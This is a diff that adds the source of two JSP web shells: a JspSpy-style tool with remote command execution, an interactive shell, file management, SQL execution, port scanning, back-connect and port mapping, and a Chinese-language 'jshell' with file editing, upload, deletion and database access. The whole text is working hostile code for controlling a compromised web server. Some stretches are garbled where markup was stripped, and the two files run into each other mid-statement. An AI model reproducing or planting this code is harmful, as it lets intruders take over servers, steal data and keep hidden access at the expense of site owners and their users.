+out.println(""+meta.getColumnName(i)+""+meta.getColumnTypeName(i)+" ");
+}
+out.println(" ");
+Table tb = new Table();
+while(rs.next()) {
+Row r = new Row();
+for (int i = 1;i<=colCount;i++) {
+r.addColumn(new Column(rs.getString(i)));
+}
+tb.addRow(r);
+}
+out.println(tb.toString());
+out.println("
affected rows : "+obj+" ");
+}
+}
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VLoginInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class LoginInvoker extends DefaultInvoker{
+public boolean doBefore() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String inputPw = request.getParameter("pw");
+if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) {
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+return;
+} else {
+JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw);
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MyComparator implements Comparator{
+public int compare(File f1,File f2) {
+if (f1 != null && f2!= null) {
+if (f1.isDirectory()) {
+if (f2.isDirectory()) {
+return f1.getName().compareTo(f2.getName());
+} else {
+return -1;
+}
+} else {
+if (f2.isDirectory()) {
+return 1;
+} else {
+return f1.getName().compareTo(f2.getName());
+}
+}
+}
+return 0;
+}
+}
+private static class FileListInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("folder");
+if (Util.isEmpty(path))
+path = JSession.getAttribute(CURRENT_DIR).toString();
+
+JSession.setAttribute(CURRENT_DIR,Util.convertPath(path));
+File file = new File(path);
+if (!file.exists()) {
+throw new Exception(path+"Dont Exists !");
+}
+JSession.setAttribute(CURRENT_DIR,path);
+File[] list = file.listFiles();
+Arrays.sort(list,new MyComparator());
+out.println("");
+String cr = null;
+try {
+cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3);
+}catch(Exception e) {
+cr = "/";
+}
+File currentRoot = new File(cr);
+out.println("
File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total "+Util.getSize(currentRoot.getTotalSpace(),'G')+" ");
+out.println("
");
+out.println("
");
+out.println("
");
+out.println("
");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println(" "+
+" "+
+" System Properties >> "+
+" "+
+"
"+
+"
");
+Properties pro = System.getProperties();
+Enumeration names = pro.propertyNames();
+while (names.hasMoreElements()){
+String name = (String)names.nextElement();
+out.println(""+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+" System Environment >> ");
+Map envs = System.getenv();
+Set> entrySet = envs.entrySet();
+for (Map.Entry en:entrySet) {
+out.println(""+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+" "+
+"
");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class TopInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println(""+
+"");
+if (JSession.getAttribute(MSG) != null) {
+Util.outMsg(out,JSession.getAttribute(MSG).toString());
+JSession.removeAttribute(MSG);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VOnLineShellInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+out.println(""+
+" "+
+" ");
+out.println("Shell OnLine » "+
+" "+
+"
");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class OnLineInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String type = request.getParameter("type");
+if (Util.isEmpty(type))
+return;
+if (type.toLowerCase().equals("start")) {
+String exe = request.getParameter("exe");
+if (Util.isEmpty(exe))
+return;
+Process pro = Runtime.getRuntime().exec(exe);
+ByteArrayOutputStream outs = new ByteArrayOutputStream();
+response.setContentLength(100000000);
+response.setContentType("text/html;charset="+Charset.defaultCharset().name());
+OnLineProcess olp = new OnLineProcess(pro);
+JSession.setAttribute(SHELL_ONLINE,olp);
+new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start();
+new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start();
+new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。
+Thread.sleep(1000 * 60 * 60 * 24);
+} else if (type.equals("ecmd")) {
+Object o = JSession.getAttribute(SHELL_ONLINE);
+String cmd = request.getParameter("cmd");
+if (Util.isEmpty(cmd))
+return;
+if (o == null)
+return;
+OnLineProcess olp = (OnLineProcess)o;
+olp.setCmd(cmd);
+} else {
+Object o = JSession.getAttribute(SHELL_ONLINE);
+if (o == null)
+return;
+OnLineProcess olp = (OnLineProcess)o;
+olp.stop();
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+
+static{
+ins.put("script",new ScriptInvoker());
+ins.put("before",new BeforeInvoker());
+ins.put("after",new AfterInvoker());
+ins.put("deleteBatch",new DeleteBatchInvoker());
+ins.put("clipboard",new ClipBoardInvoker());
+ins.put("vRemoteControl",new VRemoteControlInvoker());
+ins.put("gc",new GcInvoker());
+ins.put("vPortScan",new VPortScanInvoker());
+ins.put("portScan",new PortScanInvoker());
+ins.put("vConn",new VConnInvoker());
+ins.put("dbc",new DbcInvoker());
+ins.put("executesql",new ExecuteSQLInvoker());
+ins.put("vLogin",new VLoginInvoker());
+ins.put("login",new LoginInvoker());
+ins.put("filelist", new FileListInvoker());
+ins.put("logout",new LogoutInvoker());
+ins.put("upload",new UploadInvoker());
+ins.put("copy",new CopyInvoker());
+ins.put("bottom",new BottomInvoker());
+ins.put("vCreateFile",new VCreateFileInvoker());
+ins.put("vEdit",new VEditInvoker());
+ins.put("createFile",new CreateFileInvoker());
+ins.put("vEditProperty",new VEditPropertyInvoker());
+ins.put("editProperty",new EditPropertyInvoker());
+ins.put("vs",new VsInvoker());
+ins.put("shell",new ShellInvoker());
+ins.put("down",new DownInvoker());
+ins.put("vd",new VdInvoker());
+ins.put("downRemote",new DownRemoteInvoker());
+ins.put("index",new IndexInvoker());
+ins.put("mkdir",new MkDirInvoker());
+ins.put("move",new MoveInvoker());
+ins.put("removedir",new RemoteDirInvoker());
+ins.put("packBatch",new PackBatchInvoker());
+ins.put("pack",new PackInvoker());
+ins.put("unpack",new UnPackInvoker());
+ins.put("vmp",new VmpInvoker());
+ins.put("vbc",new VbcInvoker());
+ins.put("backConnect",new BackConnectInvoker());
+ins.put("jspEnv",new JspEnvInvoker());
+ins.put("smp",new SmpInvoker());
+ins.put("mapPort",new MapPortInvoker());
+ins.put("top",new TopInvoker());
+ins.put("vso",new VOnLineShellInvoker());
+ins.put("online",new OnLineInvoker());
+}
+%>
+<%
+try {
+String o = request.getParameter("o");
+if (!Util.isEmpty(o)) {
+Invoker in = ins.get(o);
+if (in == null) {
+response.sendRedirect(SHELL_NAME+"?o=index");
+} else {
+if (in.doBefore()) {
+String path = request.getParameter("folder");
+if (!Util.isEmpty(path))
+session.setAttribute(CURRENT_DIR,path);
+ins.get("before").invoke(request,response,session);
+ins.get("script").invoke(request,response,session);
+ins.get("top").invoke(request,response,session);
+}
+in.invoke(request,response,session);
+if (!in.doAfter()) {
+return;
+}else{
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+}
+} else {
+response.sendRedirect(SHELL_NAME+"?o=index");
+}
+} catch (Exception e) {
+ByteArrayOutputStream bout = new ByteArrayOutputStream();
+e.printStackTrace(new PrintStream(bout));
+session.setAttribute(CURRENT_DIR,SHELL_DIR);
+Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","bad command \"" + cmd + "\" ";
+ } finally {
+ return retStr;
+ }
+}
+
+public String pathConvert(String path) {
+ String sRet = path.replace('\\', '/');
+ File file = new File(path);
+
+ if (file.getParent() != null) {
+ if (file.isDirectory()) {
+ if (! sRet.endsWith("/"))
+ sRet += "/";
+ }
+ } else {
+ if (! sRet.endsWith("/"))
+ sRet += "/";
+ }
+
+ return sRet;
+}
+
+public String strCut(String str, int len) {
+ String sRet;
+
+ len -= 3;
+
+ if (str.getBytes().length <= len) {
+ sRet = str;
+ } else {
+ try {
+ sRet = (new String(str.getBytes(), 0, len, "GBK")) + "...";
+ } catch (Exception e) {
+ sRet = str;
+ }
+ }
+
+ return sRet;
+}
+
+public String listFiles(String path, String curUri) {
+ File[] files = null;
+ File curFile = null;
+ String sRet = null;
+ int n = 0;
+ boolean isRoot = path.equals("");
+
+ path = pathConvert(path);
+
+ try {
+ if (isRoot) {
+ files = File.listRoots();
+ } else {
+ try {
+ curFile = new File(path);
+ String[] sFiles = curFile.list();
+ files = new File[sFiles.length];
+
+ for (n = 0; n < sFiles.length; n ++) {
+ files[n] = new File(path + sFiles[n]);
+ }
+ } catch (Exception e) {
+ sRet = "bad path \"" + path + "\" ";
+ }
+ }
+
+ if (sRet == null) {
+ sRet = "\n";
+ sRet += "\n";
+ sRet += "\n";
+ sRet += " \n";
+
+ sRet += " \n";
+ sRet += "
\n";
+ }
+ } catch (SecurityException e) {
+ sRet = "security violation, no privilege. ";
+ }
+
+ return sRet;
+}
+
+public boolean isTextFile(String extName) {
+ int i;
+ boolean bRet = false;
+
+ if (! extName.equals("")) {
+ for (i = 0; i < _textFileTypes.length; i ++) {
+ if (extName.equals(_textFileTypes[i])) {
+ bRet = true;
+ break;
+ }
+ }
+ } else {
+ bRet = true;
+ }
+
+ return bRet;
+}
+
+public String getExtName(String fileName) {
+ String sRet = "";
+ int nLastDotPos;
+
+ fileName = pathConvert(fileName);
+
+ nLastDotPos = fileName.lastIndexOf(".");
+
+ if (nLastDotPos == -1) {
+ sRet = "";
+ } else {
+ sRet = fileName.substring(nLastDotPos + 1);
+ }
+
+ return sRet;
+}
+
+public String browseFile(String path) {
+ String sRet = "";
+ File file = null;
+ FileReader fileReader = null;
+
+ path = pathConvert(path);
+
+ try {
+ file = new File(path);
+ fileReader = new FileReader(file);
+ String fileString = "";
+ char[] chBuffer = new char[1024];
+ int ret;
+
+ sRet = "\n";
+
+ } catch (IOException e) {
+ sRet += "\n";
+ }
+
+ return sRet;
+}
+
+public String openFile(String path, String curUri) {
+ String sRet = "";
+ boolean canOpen = false;
+ int nLastDotPos = path.lastIndexOf(".");
+ String extName = "";
+ String fileString = null;
+ File curFile = null;
+
+ path = pathConvert(path);
+
+ if (nLastDotPos == -1) {
+ canOpen = true;
+ } else {
+ extName = path.substring(nLastDotPos + 1);
+ canOpen = isTextFile(extName);
+ }
+
+ if (canOpen) {
+ try {
+ fileString = "";
+ curFile = new File(path);
+ FileReader fileReader = new FileReader(curFile);
+ char[] chBuffer = new char[1024];
+ int nRet;
+
+ while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
+ fileString += new String(chBuffer, 0, nRet);
+ }
+
+ fileReader.close();
+ } catch (IOException e) {
+ fileString = null;
+ sRet = "不能打开文件\"" + path + "\" ";
+ } catch (SecurityException e) {
+ fileString = null;
+ sRet = "安全问题,没有权限执行该操作 ";
+ }
+ } else {
+ sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode ";
+ }
+
+ if (fileString != null) {
+ sRet += "\n";
+ sRet += "\n";
+ sRet += " \n";
+ sRet += "
\n";
+ }
+
+ return sRet;
+}
+
+public String saveFile(String path, String curUri, String fileContent) {
+ String sRet = "";
+ File file = null;
+
+ path = pathConvert(path);
+
+ try {
+ file = new File(path);
+
+ if (! file.canWrite()) {
+ sRet = "文件不可写 ";
+ } else {
+ FileWriter fileWriter = new FileWriter(file);
+ fileWriter.write(fileContent);
+
+ fileWriter.close();
+ sRet = "文件保存成功,正在返回,请稍候……\n";
+ sRet += "保存文件失败 ";
+ } catch (SecurityException e) {
+ sRet = "安全问题,没有权限执行该操作 ";
+ }
+
+ return sRet;
+}
+
+public String createFolder(String path, String curUri, String folderName) {
+ String sRet = "";
+ File folder = null;
+
+ path = pathConvert(path);
+
+ try {
+ folder = new File(path + folderName);
+
+ if (folder.exists() && folder.isDirectory()) {
+ sRet = "\"" + path + folderName + "\"目录已经存在 ";
+ } else {
+ if (folder.mkdir()) {
+ sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\",正在返回,请稍候……\n";
+ sRet += "创建目录\"" + folderName + "\"失败 ";
+ }
+ }
+ } catch (SecurityException e) {
+ sRet = "安全问题,没有权限执行该操作 ";
+ }
+
+ return sRet;
+}
+
+public String createFile(String path, String curUri, String fileName) {
+ String sRet = "";
+ File file = null;
+
+ path = pathConvert(path);
+
+ try {
+ file = new File(path + fileName);
+
+ if (file.createNewFile()) {
+ sRet = "\"" + path + fileName + "\"文件已经存在 ";
+ }
+ } catch (SecurityException e) {
+ sRet = "安全问题,没有权限执行该操作 ";
+ } catch (IOException e) {
+ sRet = "创建文件\"" + path + fileName + "\"失败 ";
+ }
+
+ return sRet;
+}
+
+public String deleteFile(String path, String curUri, String[] files2Delete) {
+ String sRet = "";
+ File tmpFile = null;
+
+ try {
+ for (int i = 0; i < files2Delete.length; i ++) {
+ tmpFile = new File(files2Delete[i]);
+ if (! tmpFile.delete()) {
+ sRet += "删除\"" + files2Delete[i] + "\"失败 安全问题,没有权限执行该操作 \n";
+ }
+
+ return sRet;
+}
+
+public String saveAs(String path, String curUri, String fileContent) {
+ String sRet = "";
+ File file = null;
+ FileWriter fileWriter = null;
+
+ try {
+ file = new File(path);
+
+ if (file.createNewFile()) {
+ fileWriter = new FileWriter(file);
+ fileWriter.write(fileContent);
+ fileWriter.close();
+
+ sRet = "文件\"" + path + "\"已经存在 ";
+ }
+ } catch (IOException e) {
+ sRet = "创建文件\"" + path + "\"失败 ";
+ }
+
+ return sRet;
+}
+
+
+public String uploadFile(ServletRequest request, String path, String curUri) {
+ String sRet = "";
+ File file = null;
+ InputStream in = null;
+
+ path = pathConvert(path);
+
+ try {
+ in = request.getInputStream();
+
+ byte[] inBytes = new byte[request.getContentLength()];
+ int nBytes;
+ int start = 0;
+ int end = 0;
+ int size = 1024;
+ String token = null;
+ String filePath = null;
+
+ //
+ // 把输入流读入一个字节数组
+ //
+ while ((nBytes = in.read(inBytes, start, size)) != -1) {
+ start += nBytes;
+ }
+
+ in.close();
+ //
+ // 从字节数组中得到文件分隔符号
+ //
+ int i = 0;
+ byte[] seperator;
+
+ while (inBytes[i] != 13) {
+ i ++;
+ }
+
+ seperator = new byte[i];
+
+ for (i = 0; i < seperator.length; i ++) {
+ seperator[i] = inBytes[i];
+ }
+
+ //
+ // 得到Header部分
+ //
+ String dataHeader = null;
+ i += 3;
+ start = i;
+ while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) {
+ i ++;
+ }
+ end = i - 1;
+ dataHeader = new String(inBytes, start, end - start + 1);
+
+ //
+ // 得到文件名
+ //
+ token = "filename=\"";
+ start = dataHeader.indexOf(token) + token.length();
+ token = "\"";
+ end = dataHeader.indexOf(token, start) - 1;
+ filePath = dataHeader.substring(start, end + 1);
+ filePath = pathConvert(filePath);
+ String fileName = filePath.substring(filePath.lastIndexOf("/") + 1);
+
+ //
+ // 得到文件内容开始位置
+ //
+ i += 4;
+ start = i;
+
+ /*
+ boolean found = true;
+ byte[] tmp = new byte[seperator.length];
+ while (i <= inBytes.length - 1 - seperator.length) {
+
+ for (int j = i; j < i + seperator.length; j ++) {
+ if (seperator[j - i] != inBytes[j]) {
+ found = false;
+ break;
+ } else
+ tmp[j - i] = inBytes[j];
+ }
+
+ if (found)
+ break;
+
+ i ++;
+ }*/
+
+ //
+ // 偷懒的办法
+ //
+ end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
+
+ //
+ // 保存为文件
+ //
+ File newFile = new File(path + fileName);
+ newFile.createNewFile();
+ FileOutputStream out = new FileOutputStream(newFile);
+
+ //out.write(inBytes, start, end - start + 1);
+ out.write(inBytes, start, end - start + 1);
+ out.close();
+
+ sRet = "\n";
+ } catch (IOException e) {
+ sRet = "\n";
+ }
+
+ sRet += "文件\"" + files2Copy[i] + "\"复制失败 文件\"" + file2Rename + "\"不存在 ";
+ } else {
+ file.renameTo(newFile);
+ sRet = "文件重命名成功,正在返回,请稍候……";
+ sRet += "安全问题导致文件\"" + file2Rename + "\"复制失败 ";
+ }
+
+ return sRet;
+}
+
+public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) {
+ boolean bRet = true;
+ String driverName = "";
+
+ if (dbServer.equals(""))
+ dbServer = "localhost";
+
+ try {
+ if (dbType.equals("sqlserver")) {
+ driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
+ if (dbPort.equals(""))
+ dbPort = "1433";
+ _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
+ } else if (dbType.equals("mysql")) {
+ driverName = "com.mysql.jdbc.Driver";
+ if (dbPort.equals(""))
+ dbPort = "3306";
+ _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
+ } else if (dbType.equals("odbc")) {
+ driverName = "sun.jdbc.odbc.JdbcOdbcDriver";
+ _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword;
+ } else if (dbType.equals("oracle")) {
+ driverName = "oracle.jdbc.driver.OracleDriver";
+ _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName;
+ } else if (dbType.equals("db2")) {
+ driverName = "com.ibm.db2.jdbc.app.DB2Driver";
+ _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName;
+ }
+
+ Class.forName(driverName);
+ } catch (ClassNotFoundException e) {
+ bRet = false;
+ }
+
+ return bRet;
+}
+
+public boolean DBConnect(String User, String Password) {
+ boolean bRet = false;
+
+ if (_url != null) {
+ try {
+ _dbConnection = DriverManager.getConnection(_url, User, Password);
+ _dbStatement = _dbConnection.createStatement();
+ bRet = true;
+ } catch (SQLException e) {
+ bRet = false;
+ }
+ }
+
+ return bRet;
+}
+
+public String DBExecute(String sql) {
+ String sRet = "";
+
+ if (_dbConnection == null || _dbStatement == null) {
+ sRet = "数据库没有正常连接 ";
+ } else {
+ try {
+ if (sql.toLowerCase().substring(0, 6).equals("select")) {
+ ResultSet rs = _dbStatement.executeQuery(sql);
+ ResultSetMetaData rsmd = rs.getMetaData();
+ int colNum = rsmd.getColumnCount();
+ int colType;
+
+ sRet = "sql语句执行成功,返回结果\n";
+ sRet += " \n";
+ for (int i = 1; i <= colNum; i ++) {
+ sRet += " " + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ") \n";
+ }
+ sRet += " \n";
+ while (rs.next()) {
+ sRet += " \n";
+ for (int i = 1; i <= colNum; i ++) {
+ colType = rsmd.getColumnType(i);
+
+ sRet += " ";
+ switch (colType) {
+ case Types.BIGINT:
+ sRet += rs.getLong(i);
+ break;
+
+ case Types.BIT:
+ sRet += rs.getBoolean(i);
+ break;
+
+ case Types.BOOLEAN:
+ sRet += rs.getBoolean(i);
+ break;
+
+ case Types.CHAR:
+ sRet += rs.getString(i);
+ break;
+
+ case Types.DATE:
+ sRet += rs.getDate(i).toString();
+ break;
+
+ case Types.DECIMAL:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.NUMERIC:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.REAL:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.DOUBLE:
+ sRet += rs.getDouble(i);
+ break;
+
+ case Types.FLOAT:
+ sRet += rs.getFloat(i);
+ break;
+
+ case Types.INTEGER:
+ sRet += rs.getInt(i);
+ break;
+
+ case Types.TINYINT:
+ sRet += rs.getShort(i);
+ break;
+
+ case Types.VARCHAR:
+ sRet += rs.getString(i);
+ break;
+
+ case Types.TIME:
+ sRet += rs.getTime(i).toString();
+ break;
+
+ case Types.DATALINK:
+ sRet += rs.getTimestamp(i).toString();
+ break;
+ }
+ sRet += " \n";
+ }
+ sRet += " \n";
+ }
+ sRet += "
\n";
+
+ rs.close();
+ } else {
+ if (_dbStatement.execute(sql)) {
+ sRet = "sql语句执行成功";
+ } else {
+ sRet = "sql语句执行失败 ";
+ }
+ }
+ } catch (SQLException e) {
+ sRet = "sql语句执行失败 ";
+ }
+ }
+
+ return sRet;
+}
+
+public void DBRelease() {
+ try {
+ if (_dbStatement != null) {
+ _dbStatement.close();
+ _dbStatement = null;
+ }
+
+ if (_dbConnection != null) {
+ _dbConnection.close();
+ _dbConnection = null;
+ }
+ } catch (SQLException e) {
+
+ }
+}
+
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+class JshellConfig {
+ private String _jshellContent = null;
+ private String _path = null;
+
+ public JshellConfig(String path) throws JshellConfigException {
+ _path = path;
+ read();
+ }
+
+ private void read() throws JshellConfigException {
+ try {
+ FileReader jshell = new FileReader(new File(_path));
+ char[] buffer = new char[1024];
+ int nChars;
+ _jshellContent = "";
+
+ while ((nChars = jshell.read(buffer, 0, 1024)) != -1) {
+ _jshellContent += new String(buffer, 0, nChars);
+ }
+
+ jshell.close();
+ } catch (IOException e) {
+ throw new JshellConfigException("打开文件失败");
+ }
+ }
+
+ public void save() throws JshellConfigException {
+ FileWriter jshell = null;
+
+ try {
+ jshell = new FileWriter(new File(_path));
+ char[] buffer = _jshellContent.toCharArray();
+ int start = 0;
+ int size = 1024;
+
+ for (start = 0; start < buffer.length - 1 - size; start += size) {
+ jshell.write(buffer, start, size);
+ }
+
+ jshell.write(buffer, start, buffer.length - 1 - start);
+ } catch (IOException e) {
+ new JshellConfigException("写文件失败");
+ } finally {
+ try {
+ jshell.close();
+ } catch (IOException e) {
+
+ }
+ }
+ }
+
+ public void setPassword(String password) throws JshellConfigException {
+ Pattern p = Pattern.compile("\\w+");
+ Matcher m = p.matcher(password);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("密码不能有除字母数字下划线以外的字符");
+ }
+
+ p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\"");
+ m = p.matcher(_jshellContent);
+ if (! m.find()) {
+ throw new JshellConfigException("程序体已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll("private String _password = \"" + password + "\"");
+
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public void setEncodeType(String encodeType) throws JshellConfigException {
+ Pattern p = Pattern.compile("[A-Za-z0-9]+");
+ Matcher m = p.matcher(encodeType);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("编码格式只能是字母和数字的组合");
+ }
+
+ p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\"");
+ m = p.matcher(_jshellContent);
+
+ if (! m.find()) {
+ throw new JshellConfigException("程序体已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\"");
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public void setSessionTime(String sessionTime) throws JshellConfigException {
+ Pattern p = Pattern.compile("\\d+");
+ Matcher m = p.matcher(sessionTime);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("session超时时间只能填数字");
+ }
+
+ p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime);
+ m = p.matcher(_jshellContent);
+
+ if (! m.find()) {
+ throw new JshellConfigException("程序体已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime);
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException {
+ Pattern p = Pattern.compile("\\w+");
+ Matcher m = null;
+ int i;
+ String fileTypes = "";
+ String tmpFileTypes = "";
+
+ for (i = 0; i < textFileTypes.length; i ++) {
+ m = p.matcher(textFileTypes[i]);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("扩展名只能是字母数字和下划线的组合");
+ }
+
+ if (i != textFileTypes.length - 1)
+ fileTypes += "\"" + textFileTypes[i] + "\"" + ", ";
+ else
+ fileTypes += "\"" + textFileTypes[i] + "\"";
+ }
+
+ for (i = 0; i < _textFileTypes.length; i ++) {
+ if (i != _textFileTypes.length - 1)
+ tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", ";
+ else
+ tmpFileTypes += "\"" + _textFileTypes[i] + "\"";
+ }
+
+ p = Pattern.compile(tmpFileTypes);
+ m = p.matcher(_jshellContent);
+
+ if (! m.find()) {
+ throw new JshellConfigException("程序文件已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll(fileTypes);
+
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public String getContent() {
+ return HTMLEncode(_jshellContent);
+ }
+}
+
+class JshellConfigException extends Exception {
+ public JshellConfigException(String message) {
+ super(message);
+ }
+}
+%>
+
+
+jshell ver 0.1
+
+
+
+
+<%
+session.setMaxInactiveInterval(_sessionOutTime * 60);
+
+if (request.getParameter("password") == null && session.getAttribute("password") == null) {
+// show the login form
+//================================================================================================
+%>
+
+<%
+//================================================================================================
+// end of the login form
+} else {
+ String password = null;
+
+ if (session.getAttribute("password") == null) {
+ password = (String)request.getParameter("password");
+
+ if (validate(password) == false) {
+ out.println("密码错误!
");
+ out.close();
+ return;
+ }
+
+ session.setAttribute("password", password);
+ } else {
+ password = (String)session.getAttribute("password");
+ }
+
+ String action = null;
+
+ if (request.getParameter("action") == null)
+ action = "main";
+ else
+ action = (String)request.getParameter("action");
+
+ if (action.equals("exit")) {
+ session.removeAttribute("password");
+ response.sendRedirect(request.getRequestURI());
+ out.close();
+ return;
+ }
+
+// show the main menu
+//====================================================================================
+%>
+
+<%
+//=====================================================================================
+// end of main menu
+
+ if (action.equals("main")) {
+// print the system info table
+//=======================================================================================
+%>
+
+
+ 服务器信息
+
+
+ 服务器名
+ <%=request.getServerName()%>
+
+
+ 服务器端口
+ <%=request.getServerPort()%>
+
+
+ 操作系统
+ <%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
+
+
+ 当前用户名
+ <%=System.getProperty("user.name")%>
+
+
+ 当前用户目录
+ <%=System.getProperty("user.home")%>
+
+
+ 当前用户工作目录
+ <%=System.getProperty("user.dir")%>
+
+
+ 程序相对路径
+ <%=request.getRequestURI()%>
+
+
+ 程序绝对路径
+ <%=request.getRealPath(request.getServletPath())%>
+
+
+ 网络协议
+ <%=request.getProtocol()%>
+
+
+ 服务器软件版本信息
+ <%=application.getServerInfo()%>
+
+
+ JDK版本
+ <%=System.getProperty("java.version")%>
+
+
+ JDK安装路径
+ <%=System.getProperty("java.home")%>
+
+
+ JAVA虚拟机版本
+ <%=System.getProperty("java.vm.specification.version")%>
+
+
+ JAVA虚拟机名
+ <%=System.getProperty("java.vm.name")%>
+
+
+ JAVA类路径
+ <%=System.getProperty("java.class.path")%>
+
+
+ JAVA载入库搜索路径
+ <%=System.getProperty("java.library.path")%>
+
+
+ JAVA临时目录
+ <%=System.getProperty("java.io.tmpdir")%>
+
+
+ JIT编译器名
+ <%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
+
+
+ 扩展目录路径
+ <%=System.getProperty("java.ext.dirs")%>
+
+
+ 客户端信息
+
+
+ 客户机地址
+ <%=request.getRemoteAddr()%>
+
+
+ 服务机器名
+ <%=request.getRemoteHost()%>
+
+
+ 用户名
+ <%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
+
+
+ 请求方式
+ <%=request.getScheme()%>
+
+
+ 应用安全套接字层
+ <%=request.isSecure() == true ? "是" : "否"%>
+
+
+<%
+//=======================================================================================
+// end of printing the system info table
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("filesystem")) {
+ String curPath = "";
+ String result = "";
+ String fsAction = "";
+
+ if (request.getParameter("curPath") == null) {
+ curPath = request.getRealPath(request.getServletPath());
+ curPath = pathConvert((new File(curPath)).getParent());
+ } else {
+ curPath = Unicode2GB((String)request.getParameter("curPath"));
+ }
+
+ if (request.getParameter("fsAction") == null) {
+ fsAction = "list";
+ } else {
+ fsAction = (String)request.getParameter("fsAction");
+ }
+
+ if (fsAction.equals("list"))
+ result = listFiles(curPath, request.getRequestURI() + "?action=" + action);
+ else if (fsAction.equals("browse")) {
+ result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action);
+ result += browseFile(curPath);
+ }
+ else if (fsAction.equals("open"))
+ result = openFile(curPath, request.getRequestURI() + "?action=" + action);
+ else if (fsAction.equals("save")) {
+ if (request.getParameter("fileContent") == null) {
+ result = "页面导航错误 ";
+ } else {
+ String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
